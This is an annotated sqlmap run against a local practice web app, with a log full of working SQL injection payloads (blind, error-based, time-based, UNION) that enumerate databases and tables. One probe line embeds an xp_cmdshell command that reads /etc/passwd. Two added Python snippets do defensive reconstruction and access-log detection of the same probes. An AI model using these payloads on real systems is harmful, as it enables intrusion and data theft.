Using sqlmap
Running python sqlmap.py -v3 -u http://127.0.0.1/test/validate.php?id=1 --dbs --tables produces the log below, annotated phase by phase:
Initialization (resolve the hostname, determine the page charset)
[17:28:39] [DEBUG] cleaning up configuration parameters
[17:28:40] [DEBUG] setting the HTTP timeout
[17:28:40] [DEBUG] creating HTTP requests opener object
[17:28:40] [DEBUG] resolving hostname '127.0.0.1'
[17:28:40] [INFO] testing connection to the target URL
[17:28:41] [DEBUG] declared web page charset 'utf-8'
Environment check: WAF/IPS/IDS protection
[17:28:41] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[17:28:41] [PAYLOAD] ahzV=9142 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#
Determining injectability and injection type (boolean-based blind)
[17:28:42] [INFO] testing if the target URL is stable
[17:28:43] [INFO] target URL is stable
[17:28:43] [INFO] testing if GET parameter 'id' is dynamic
[17:28:43] [PAYLOAD] 8267
[17:28:44] [INFO] confirming that GET parameter 'id' is dynamic
[17:28:44] [PAYLOAD] 5749
[17:28:45] [WARNING] GET parameter 'id' does not appear dynamic
[17:28:45] [PAYLOAD] 1"..)".",''
[17:28:46] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[17:28:46] [PAYLOAD] 1'YuAvwN<'">HeGQes
[17:28:47] [INFO] testing for SQL injection on GET parameter 'id'
[17:28:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:28:47] [PAYLOAD] 1) AND 8987=4935 AND (3536=3536
[17:28:48] [PAYLOAD] 1) AND 3701=3701 AND (4550=4550
[17:28:49] [PAYLOAD] 1 AND 9686=8234
[17:28:50] [PAYLOAD] 1 AND 3701=3701
[17:28:51] [PAYLOAD] 1 AND 8253=7350-- EnRF
[17:28:52] [PAYLOAD] 1 AND 3701=3701-- FLRJ
[17:28:53] [PAYLOAD] 1') AND 7509=1564 AND ('Jebu'='Jebu
[17:28:54] [PAYLOAD] 1') AND 3701=3701 AND ('geaK'='geaK
[17:28:55] [PAYLOAD] 1' AND 8063=2482 AND 'XbEF'='XbEF
[17:28:56] [PAYLOAD] 1' AND 3701=3701 AND 'RMkX'='RMkX
[17:28:57] [PAYLOAD] 1' AND 5856=1503 AND 'RDlY'='RDlY
[17:28:58] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
Fingerprinting the back-end DBMS type and version from response characteristics (MySQL >= 5.0.12, match ratio 0.6)
[17:28:58] [PAYLOAD] 1' AND (SELECT CHR(114)&CHR(100)&CHR(107)&CHR(97) FROM MSysAccessObjects)=CHR(114)&CHR(100)&CHR(107)&CHR(97) AND 'DbiY'='DbiY
[17:28:59] [PAYLOAD] 1' AND (SELECT CHR(74)||CHR(118)||CHR(111)||CHR(107) FROM SYSIBM.SYSDUMMY1)=CHR(74)||CHR(118)||CHR(111)||CHR(107) AND 'cSsG'='cSsG
[17:29:00] [PAYLOAD] 1' AND (SELECT 'mfPA' FROM RDB$DATABASE)='mfPA' AND 'aTlO'='aTlO
[17:29:01] [PAYLOAD] 1' AND (SELECT CHAR(102)||CHAR(84)||CHAR(76)||CHAR(90) FROM INFORMATION_SCHEMA.SYSTEM_USERS)=CHAR(102)||CHAR(84)||CHAR(76)||CHAR(90) AND 'Jlkw'='Jlkw
[17:29:02] [PAYLOAD] 1' AND (SELECT 'kWiI' FROM VERSIONS)='kWiI' AND 'ZErM'='ZErM
[17:29:03] [PAYLOAD] 1' AND (SELECT CHAR(73)+CHAR(103)+CHAR(110)+CHAR(66))=CHAR(73)+CHAR(103)+CHAR(110)+CHAR(66) AND 'TwOu'='TwOu
[17:29:04] [PAYLOAD] 1' AND (SELECT CHAR(73)+CHAR(103)+CHAR(110)+CHAR(66))=CHAR(110)+CHAR(90)+CHAR(82)+CHAR(106) AND 'uRvF'='uRvF
[17:29:05] [PAYLOAD] 1' AND (SELECT 0x70676341)=0x70676341 AND 'Rzan'='Rzan
[17:29:06] [PAYLOAD] 1' AND (SELECT 0x70676341)=0x70707a4a AND 'kWRF'='kWRF
[17:29:07] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
[18:51:13] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[18:51:13] [PAYLOAD] 1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71766a7071,(SELECT (ELT(5899=5899,1))),0x71766a7671,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'RXbN'='RXbN
[18:51:14] [CRITICAL] unable to connect to the target URL ('
') or proxy. sqlmap is going to retry the request(s)
[18:51:14] [DEBUG] unable to connect to the target URL ('
') or proxy. sqlmap is going to retry the request
[18:51:14] [DEBUG] unable to connect to the target URL ('
') or proxy. sqlmap is going to retry the request
[18:51:15] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
[18:51:15] [PAYLOAD] 1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71766a7071,(SELECT (ELT(4950=4950,1))),0x71766a7671,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'OBtX'='OBtX
[18:51:16] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[18:51:16] [PAYLOAD] 1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x71766a7071,(SELECT (ELT(7284=7284,1))),0x71766a7671,0x78))x)) AND 'XMFW'='XMFW
[18:51:17] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
[18:51:18] [PAYLOAD] 1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x71766a7071,(SELECT (ELT(6492=6492,1))),0x71766a7671,0x78))x)) AND 'XnKl'='XnKl
[18:51:19] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[18:51:19] [PAYLOAD] 1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71766a7071,(SELECT (ELT(1401=1401,1))),0x71766a7671)) USING utf8))) AND 'rPMT'='rPMT
[18:51:20] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE, HAVING clause (JSON_KEYS)'
[18:51:20] [PAYLOAD] 1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71766a7071,(SELECT (ELT(6928=6928,1))),0x71766a7671)) USING utf8))) AND 'dDAJ'='dDAJ
[18:51:21] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:51:21] [PAYLOAD] 1' AND (SELECT 2362 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(2362=2362,1))),0x71766a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WpJo'='WpJo
[18:51:22] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:51:22] [PAYLOAD] 1' OR (SELECT 2642 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(2642=2642,1))),0x71766a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'DGTi'='DGTi
[18:51:23] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:51:23] [PAYLOAD] 1' AND EXTRACTVALUE(2314,CONCAT(0x5c,0x71766a7071,(SELECT (ELT(2314=2314,1))),0x71766a7671)) AND 'MlLO'='MlLO
[18:51:24] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:51:24] [PAYLOAD] 1' OR EXTRACTVALUE(3279,CONCAT(0x5c,0x71766a7071,(SELECT (ELT(3279=3279,1))),0x71766a7671)) AND 'rGGW'='rGGW
[18:51:25] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[18:51:25] [PAYLOAD] 1' AND UPDATEXML(3523,CONCAT(0x2e,0x71766a7071,(SELECT (ELT(3523=3523,1))),0x71766a7671),5575) AND 'hWrX'='hWrX
[18:51:26] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[18:51:26] [PAYLOAD] 1' OR UPDATEXML(3425,CONCAT(0x2e,0x71766a7071,(SELECT (ELT(3425=3425,1))),0x71766a7671),7820) AND 'WRvI'='WRvI
[18:51:27] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:51:27] [PAYLOAD] 1' AND ROW(5681,3126)>(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(5681=5681,1))),0x71766a7671,FLOOR(RAND(0)*2))x FROM (SELECT 8419 UNION SELECT 2289 UNION SELECT 6743 UNION SELECT 1845)a GROUP BY x) AND 'ARNc'='ARNc
[18:51:28] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause (FLOOR)'
[18:51:28] [PAYLOAD] 1' OR ROW(8270,8355)>(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(8270=8270,1))),0x71766a7671,FLOOR(RAND(0)*2))x FROM (SELECT 9652 UNION SELECT 4070 UNION SELECT 3526 UNION SELECT 2818)a GROUP BY x) AND 'DOpg'='DOpg
[18:51:29] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[18:51:29] [PAYLOAD] -2827
[18:51:30] [PAYLOAD] -2163' OR 1 GROUP BY CONCAT(0x71766a7071,(SELECT (CASE WHEN (3728=3728) THEN 1 ELSE 0 END)),0x71766a7671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
[18:51:31] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[18:51:31] [PAYLOAD] 1' PROCEDURE ANALYSE(EXTRACTVALUE(9234,CONCAT(0x5c,0x71766a7071,(SELECT (CASE WHEN (9234=9234) THEN 1 ELSE 0 END)),0x71766a7671)),1) AND 'tDdN'='tDdN
[18:51:32] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[18:51:32] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[18:51:32] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[18:51:32] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[18:51:32] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[18:51:32] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[18:51:32] [INFO] testing 'MySQL inline queries'
[18:51:32] [PAYLOAD] (SELECT CONCAT(0x71766a7071,(SELECT (ELT(7909=7909,1))),0x71766a7671))
[18:51:33] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[18:51:33] [PAYLOAD] 1';SELECT SLEEP(5)#
[18:51:34] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[18:51:34] [PAYLOAD] 1';SELECT SLEEP(5) AND 'psZF'='psZF
[18:51:35] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[18:51:35] [PAYLOAD] 1';SELECT BENCHMARK(5000000,MD5(0x6477584b))#
[18:51:36] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[18:51:36] [PAYLOAD] 1';SELECT BENCHMARK(5000000,MD5(0x446a4f65)) AND 'AIFn'='AIFn
[18:51:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[18:51:37] [PAYLOAD] 1' AND SLEEP(5) AND 'Ngyy'='Ngyy
[18:51:43] [PAYLOAD] 1' AND SLEEP(5) AND 'Ngyy'='Ngyy
[18:51:49] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
[18:51:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:51:49] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:51:49] [PAYLOAD] 1' ORDER BY 1-- zxuS
[18:51:50] [PAYLOAD] 1' ORDER BY 3603-- ZDKi
[18:51:51] [DEBUG] setting match ratio for current parameter to 0.600
Determining the number of columns in the query (binary search with ORDER BY)
[18:51:51] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[18:51:51] [PAYLOAD] 1' ORDER BY 10-- hKIf
[18:51:52] [PAYLOAD] 1' ORDER BY 6-- MBub
[18:51:53] [PAYLOAD] 1' ORDER BY 8-- mdEk
[18:51:54] [PAYLOAD] 1' ORDER BY 9-- EQQE
[18:51:55] [INFO] target URL appears to have 8 columns in query
Testing a UNION query on the id parameter
[18:51:55] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,0x786e6c704d416d5544724b4f4a4178724e775252686f744344576f706f5a4f57485541567377586e,0x71766a7671),NULL,NULL,NULL,NULL-- iqYL
[18:51:56] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,0x786e6c704d416d5544724b4f4a4178724e775252686f744344576f706f5a4f57485541567377586e,0x71766a7671),NULL,NULL,NULL,NULL UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,0x456e4b6372506562775171447847415a667866754d4878504c55524a645257624667685377784748,0x71766a7671),NULL,NULL,NULL,NULL-- kwXd
[18:51:57] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,0x786e6c704d416d5544724b4f4a4178724e775252686f744344576f706f5a4f57485541567377586e,0x71766a7671),NULL,NULL,NULL,NULL FROM (SELECT 0 AS KdfH UNION SELECT 1 UNION SELECT 2 UNION SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6 UNION SELECT 7 UNION SELECT 8 UNION SELECT 9 UNION SELECT 10 UNION SELECT 11 UNION SELECT 12 UNION SELECT 13 UNION SELECT 14) AS lWUm-- HUty
[18:51:59] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
Checking for parameter length limits
[18:51:59] [DEBUG] checking for parameter length constrainting mechanisms
[18:51:59] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,(CASE WHEN (3602= 3602) THEN 1 ELSE 0 END),0x71766a7671),NULL,NULL,NULL,NULL-- jEVX
[18:52:00] [DEBUG] performed 1 queries in 1.45 seconds
[18:52:00] [DEBUG] checking for filtered characters
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 54 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 3701=3701 AND 'RMkX'='RMkX
Vector: AND [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'Ngyy'='Ngyy
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,0x786e6c704d416d5544724b4f4a4178724e775252686f744344576f706f5a4f57485541567377586e,0x71766a7671),NULL,NULL,NULL,NULL-- iqYL
Vector: UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL[GENERIC_SQL_COMMENT]
---
[19:21:04] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.29, Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[19:21:04] [INFO] fetching database names
Fetching database names (querying information_schema.schemata metadata)
[19:21:04] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,IFNULL(CAST(schema_name AS CHAR),0x20),0x71766a7671),NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA-- qmix
qvjpqinformation_schemaqvjvq
qvjpqchallengesqvjvq
qvjpqdvwaqvjvq
qvjpqmysqlqvjvq
qvjpqperformance_schemaqvjvq
qvjpqsecurityqvjvq
qvjpqtestqvjvq
[19:21:04] [CRITICAL] unable to connect to the target URL ('
') or proxy. sqlmap is going to retry the request(s)
[19:21:04] [DEBUG] unable to connect to the target URL ('
') or proxy. sqlmap is going to retry the request
[19:21:04] [DEBUG] unable to connect to the target URL ('
') or proxy. sqlmap is going to retry the request
[19:21:05] [DEBUG] performed 1 queries in 1.12 seconds
available databases [7]:
challenges
dvwa
information_schema
mysql
performance_schema
security
test
Fetching table names (querying information_schema.tables metadata)
[19:21:05] [INFO] fetching tables for databases: 'challenges, dvwa, information_schema, mysql, performance_schema, security, test'
[19:21:05] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,IFNULL(CAST(table_schema AS CHAR),0x20),0x766d62686465,IFNULL(CAST(table_name AS CHAR),0x20),0x71766a7671),NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x6368616c6c656e676573,0x64767761,0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c,0x706572666f726d616e63655f736368656d61,0x7365637572697479,0x74657374)-- eEZq
qvjpqdvwavmbhdeguestbookqvjvq
qvjpqdvwavmbhdeusersqvjvq
[19:21:06] [DEBUG] performed 1 queries in 1.11 seconds
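When reconstructing an exchange like this one during incident response, the question that matters is which rows actually left the database. The snippet below (an added example, not part of these notes or of sqlmap) recovers the row markers and column separator from a captured UNION payload and uses them to cut the disclosed rows out of the raw response; PAYLOAD and RESPONSE are constructed from the table-listing request and the marker-wrapped rows shown above.

```python
import re

# Constructed samples modelled on the walkthrough: the table-listing payload and
# the raw response rows it produced. The markers qvjpq/qvjvq and the column
# separator vmbhde are sqlmap's per-run random strings, carried as 0x... literals.
PAYLOAD = ("1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,"
           "IFNULL(CAST(table_schema AS CHAR),0x20),0x766d62686465,"
           "IFNULL(CAST(table_name AS CHAR),0x20),0x71766a7671),NULL,NULL,NULL,NULL "
           "FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x64767761)-- eEZq")
RESPONSE = "<td>qvjpqdvwavmbhdeguestbookqvjvq</td><td>qvjpqdvwavmbhdeusersqvjvq</td>"

HEX = re.compile(r"0x([0-9a-f]+)", re.I)

def concat_args(payload):
    """Return the text inside the outermost CONCAT( ... ) by matching parentheses."""
    start = payload.upper().index("CONCAT(") + len("CONCAT(")
    depth = 1
    for i in range(start, len(payload)):
        depth += {"(": 1, ")": -1}.get(payload[i], 0)
        if depth == 0:
            return payload[start:i]
    raise ValueError("unbalanced CONCAT in payload")

def markers_from_payload(payload):
    """(prefix, [separators], suffix): the first and last hex literal of the CONCAT
    are the row markers; non-blank literals between them are column separators
    (0x20 is only the IFNULL fallback and is skipped)."""
    lits = [bytes.fromhex(h).decode("ascii") for h in HEX.findall(concat_args(payload))]
    return lits[0], [s for s in lits[1:-1] if s.strip()], lits[-1]

def recover_rows(payload, response):
    """Cut every prefix...suffix span out of the response and split it into columns."""
    prefix, seps, suffix = markers_from_payload(payload)
    rows = []
    for chunk in re.findall(re.escape(prefix) + "(.*?)" + re.escape(suffix), response, re.S):
        for sep in seps:
            chunk = chunk.replace(sep, "\x00")
        rows.append(tuple(chunk.split("\x00")))
    return rows
```

The same routine handles the earlier schemata request, where the CONCAT carries no separator and each recovered row is a single database name.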
Database: performance_schema
Database: dvwa
[2 tables]
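From the defender's side, the probe sequence in this log is a recognisable fingerprint in the web server's access log: a tautology pair such as AND 3701=3701, SLEEP(5), ORDER BY N-- probes, then UNION ALL SELECT NULL,... against information_schema. The scanner below (an added example, not from these notes or from sqlmap) classifies access-log requests against those patterns and decodes the 0x... literals so the schema names being enumerated are readable; SAMPLE_LOG is constructed and SIGNATURES are my own regexes derived from the payloads above.

```python
import re
from urllib.parse import unquote_plus
# Probe signatures taken from the sqlmap phases shown in the walkthrough above.
SIGNATURES = {
    "boolean-blind": re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*\2\b", re.I),  # AND 3701=3701
    "time-blind": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),          # AND SLEEP(5)
    "column-probe": re.compile(r"\bORDER\s+BY\s+\d+\s*--", re.I),         # ORDER BY 9-- EQQE
    "union-extract": re.compile(r"\bUNION\s+ALL\s+SELECT\b.*\bNULL\b", re.I),
    "schema-read": re.compile(r"\binformation_schema\.", re.I),
}
HEX_LITERAL = re.compile(r"0x([0-9a-f]{2,})\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

# Constructed Apache-style access-log lines echoing the payloads above (not real traffic).
SAMPLE_LOG = """\
127.0.0.1 - - [01/Jan/2020:17:28:56 +0800] "GET /test/validate.php?id=1%27%20AND%203701%3D3701%20AND%20%27RMkX%27%3D%27RMkX HTTP/1.1" 200 812
127.0.0.1 - - [01/Jan/2020:18:51:37 +0800] "GET /test/validate.php?id=1%27%20AND%20SLEEP(5)%20AND%20%27Ngyy%27%3D%27Ngyy HTTP/1.1" 200 812
127.0.0.1 - - [01/Jan/2020:18:51:54 +0800] "GET /test/validate.php?id=1%27%20ORDER%20BY%209--%20EQQE HTTP/1.1" 200 301
127.0.0.1 - - [01/Jan/2020:19:21:05 +0800] "GET /test/validate.php?id=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x71766a7071,IFNULL(CAST(table_schema%20AS%20CHAR),0x20),0x766d62686465,IFNULL(CAST(table_name%20AS%20CHAR),0x20),0x71766a7671),NULL,NULL,NULL,NULL%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema%20IN%20(0x64767761,0x7365637572697479)--%20eEZq HTTP/1.1" 200 1440
127.0.0.1 - - [01/Jan/2020:19:30:00 +0800] "GET /test/validate.php?id=7 HTTP/1.1" 200 812
"""

def decode_hex_literals(sql):
    """Decode MySQL 0x... literals, keeping only printable ASCII (sqlmap hides names in them)."""
    out = []
    for h in HEX_LITERAL.findall(sql):
        try:
            text = bytes.fromhex(h).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            out.append(text)
    return out

def classify(url):
    """Return the set of signature names matched by the URL-decoded request."""
    decoded = unquote_plus(url)
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}

def scan_log(text):
    """One finding per access-log line whose request matches at least one signature."""
    findings = []
    for line in text.splitlines():
        m = REQUEST.search(line)
        tags = classify(m.group(1)) if m else set()
        if tags:
            request = unquote_plus(m.group(1))
            findings.append({"request": request, "tags": sorted(tags),
                             "literals": decode_hex_literals(request)})
    return findings
```

Run over real logs, a single host hitting all five categories within a few minutes is the whole sqlmap run shown above; the decoded literals tell you which schemas it was reading.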